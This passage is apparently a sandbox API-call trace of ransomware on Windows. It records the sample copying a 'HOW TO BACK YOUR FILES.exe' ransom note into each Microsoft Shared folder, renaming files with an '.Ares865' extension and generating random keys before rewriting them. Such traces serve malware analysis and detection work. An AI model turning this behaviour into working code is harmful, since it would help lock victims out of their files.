dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.771] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.771] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.771] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery" [0075.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0075.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0075.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned 57 [0075.772] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery" [0075.772] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.772] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.777] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.777] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5eab29a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5eab29a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.777] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.777] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.785] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine" [0075.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0075.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0075.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine") returned 60 [0075.785] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine" [0075.785] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.785] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.805] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ead8b00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ead8b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.806] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.806] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag" [0075.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0075.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0075.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag") returned 56 [0075.806] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag" [0075.806] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.806] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.812] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.812] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5eafec60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5eafec60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.812] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.812] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.812] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS" [0075.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0075.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0075.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS") returned 62 [0075.812] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS" [0075.812] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.812] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.816] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.816] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5eb24dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5eb24dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.817] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.817] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.817] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033" [0075.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0075.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0075.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033") returned 67 [0075.817] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033" [0075.817] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.817] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.831] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.831] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5eb24dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5eb24dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.832] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.832] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.832] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.Ares865") returned 85 [0075.832] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.ares865"), dwFlags=0x1) returned 1 [0075.833] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.833] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8918) returned 1 [0075.834] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.835] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.835] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.848] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.849] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.849] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.849] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.Ares865") returned 85 [0075.849] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.ares865"), dwFlags=0x1) returned 1 [0075.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.853] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1844) returned 1 [0075.853] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.859] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.859] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.861] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.861] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.861] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.862] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.Ares865") returned 86 [0075.862] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.ares865"), dwFlags=0x1) returned 1 [0075.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2687) returned 1 [0075.864] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.864] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.864] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.867] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.867] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.867] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.868] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.Ares865") returned 84 [0075.868] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.ares865"), dwFlags=0x1) returned 1 [0075.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.869] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8564) returned 1 [0075.869] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.870] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.870] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.874] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.874] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.875] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.875] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033" [0075.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0075.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0075.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033") returned 61 [0075.875] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033" [0075.875] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.875] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.881] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.881] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ebbd340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ebbd340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.881] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.881] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.881] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF" [0075.881] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0075.881] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0075.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF") returned 52 [0075.881] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF" [0075.881] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.881] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.891] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ebbd340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ebbd340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.891] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.891] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.892] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform" [0075.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0075.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0075.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform") returned 79 [0075.892] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform" [0075.892] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.892] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.896] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.897] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ebe34a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ebe34a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.897] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.897] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.911] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14", iMaxLength=260 